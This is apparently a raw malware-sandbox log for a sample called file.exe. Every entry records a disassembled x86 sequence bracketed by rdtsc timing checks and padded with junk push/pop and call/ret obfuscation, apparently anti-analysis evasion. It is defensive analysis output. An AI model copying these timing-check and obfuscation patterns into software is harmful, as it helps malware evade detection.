                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBB4C second address: 10BBB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBB52 second address: 10BBB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F23E second address: 101F242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F242 second address: 101F248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F248 second address: 101F250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F250 second address: 101F254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072D8B second address: 1072D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072D91 second address: 1072DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ecx, di 0x0000000c lea eax, dword ptr [ebp+12494AFEh] 0x00000012 jc 00007FB0D477636Ah 0x00000018 mov di, 1CC6h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072DB4 second address: 1072DBE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072DBE second address: 1052C0C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0D477637Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB0D4776374h 0x00000010 nop 0x00000011 or ch, FFFFFFC7h 0x00000014 mov dx, 4413h 0x00000018 call dword ptr [ebp+122D3219h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072EA7 second address: 1072EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072EAC second address: 1072F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB0D4776366h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FB0D4776376h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jnl 00007FB0D4776368h 0x00000023 jns 00007FB0D477636Ch 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov di, 674Eh 0x00000034 mov dword ptr [ebp+12494B56h], esp 0x0000003a movsx edi, ax 0x0000003d cmp dword ptr [ebp+122D29C6h], 00000000h 0x00000044 jne 00007FB0D477648Bh 0x0000004a mov edi, dword ptr [ebp+122D1AB9h] 0x00000050 mov byte ptr [ebp+122D3464h], 00000047h 0x00000057 or dword ptr [ebp+12489124h], ecx 0x0000005d mov eax, D49AA7D2h 0x00000062 push 00000000h 0x00000064 push ebp 0x00000065 call 00007FB0D4776368h 0x0000006a pop ebp 0x0000006b mov dword ptr [esp+04h], ebp 0x0000006f add dword ptr [esp+04h], 0000001Ah 0x00000077 inc ebp 0x00000078 push ebp 0x00000079 ret 0x0000007a pop ebp 0x0000007b ret 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jng 00007FB0D4776368h 0x00000085 push ecx 0x00000086 pop ecx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072F54 second address: 1072F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D54BC073h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107318C second address: 1073192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073192 second address: 1073196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073342 second address: 1073349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073555 second address: 1073559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073812 second address: 1073829 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0D4776368h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FB0D4776368h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073CD2 second address: 1073CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073CD7 second address: 1073CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073F24 second address: 1073F7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FB0D54BC066h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, ax 0x00000010 lea eax, dword ptr [ebp+12494B42h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FB0D54BC068h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 or dword ptr [ebp+122D347Eh], edx 0x00000036 mov dx, D051h 0x0000003a nop 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop edx 0x00000040 push edi 0x00000041 pushad 0x00000042 popad 0x00000043 pop edi 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 je 00007FB0D54BC066h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073F7E second address: 1073FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FB0D4776366h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov cx, dx 0x00000012 lea eax, dword ptr [ebp+12494AFEh] 0x00000018 pushad 0x00000019 adc edx, 1DE10ECAh 0x0000001f mov di, dx 0x00000022 popad 0x00000023 nop 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073FA7 second address: 1073FC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB0D54BC073h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB17E second address: 10BB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB2EB second address: 10BB2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007FB0D54BC066h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB2FC second address: 10BB30C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0D4776366h 0x00000008 js 00007FB0D4776366h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB30C second address: 10BB34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D54BC076h 0x00000008 jmp 00007FB0D54BC079h 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FB0D54BC066h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB34F second address: 10BB353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB353 second address: 10BB384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC075h 0x00000007 jmp 00007FB0D54BC06Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FB0D54BC06Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB384 second address: 10BB3A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB0D4776370h 0x00000008 js 00007FB0D4776366h 0x0000000e pop ebx 0x0000000f ja 00007FB0D4776377h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB636 second address: 10BB64A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC070h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB64A second address: 10BB6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FB0D4776377h 0x00000010 popad 0x00000011 jmp 00007FB0D4776377h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB0D4776375h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A0 second address: 10BB6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A4 second address: 10BB6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB6A8 second address: 10BB6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDECC second address: 10BDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB0D4776366h 0x0000000a popad 0x0000000b jmp 00007FB0D4776370h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C130C second address: 10C132B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB0D54BC075h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8636 second address: 10C8669 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FB0D4776366h 0x00000009 pop ebx 0x0000000a jmp 00007FB0D4776370h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB0D477636Bh 0x00000018 jmp 00007FB0D477636Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8669 second address: 10C866F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C866F second address: 10C8673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7195 second address: 10C71B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC06Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jns 00007FB0D54BC066h 0x00000012 jg 00007FB0D54BC066h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C72E1 second address: 10C7327 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0D477637Ah 0x00000008 jmp 00007FB0D4776370h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007FB0D4776374h 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10739A6 second address: 10739B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FB0D54BC066h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10739B5 second address: 1073A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FB0D4776368h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 or dword ptr [ebp+122D1AB9h], ecx 0x00000027 mov edi, dword ptr [ebp+122D2BDAh] 0x0000002d mov ebx, dword ptr [ebp+12494B3Dh] 0x00000033 mov edx, 34716F4Eh 0x00000038 add eax, ebx 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FB0D4776368h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A22 second address: 1073A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A27 second address: 1073A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073A2D second address: 1073A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C79DE second address: 10C79EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB0D4776366h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BCCB second address: 101BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BCCF second address: 101BCE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB461 second address: 10CB46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB0D54BC066h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB5AE second address: 10CB5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0D4776371h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB887 second address: 10CB8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007FB0D54BC066h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 jc 00007FB0D54BC075h 0x00000019 jmp 00007FB0D54BC06Fh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D007E second address: 10D0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF4CC second address: 10CF4E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC073h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF8F8 second address: 10CF8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF8FC second address: 10CF912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB0D54BC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jg 00007FB0D54BC066h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA58 second address: 10CFA7E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB0D477636Ah 0x00000008 pop esi 0x00000009 jmp 00007FB0D477636Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA7E second address: 10CFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFA82 second address: 10CFAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Ch 0x00000007 jns 00007FB0D4776366h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FB0D4776368h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFAA0 second address: 10CFAB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Eh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFAB7 second address: 10CFABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7085 second address: 10D709E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC075h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D737D second address: 10D73A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB0D4776366h 0x00000016 jmp 00007FB0D4776375h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7623 second address: 10D7636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB0D54BC066h 0x0000000a popad 0x0000000b jl 00007FB0D54BC06Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7636 second address: 10D7644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB0D4776366h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7C87 second address: 10D7C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7C8B second address: 10D7C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D84DE second address: 10D84E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8DFF second address: 10D8E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E03 second address: 10D8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB0D54BC078h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E27 second address: 10D8E37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E37 second address: 10D8E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E3C second address: 10D8E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4B08 second address: 10E4B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D40 second address: 10E3D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D48 second address: 10E3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D4C second address: 10E3D54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D54 second address: 10E3D69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FB0D54BC066h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FB0D54BC066h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D69 second address: 10E3D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D74 second address: 10E3D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E464A second address: 10E4699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D4776373h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB0D4776375h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FB0D4776376h 0x00000018 je 00007FB0D477636Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E47E2 second address: 10E47EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB6F6 second address: 10EB706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FB0D4776366h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBECA second address: 10EBED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
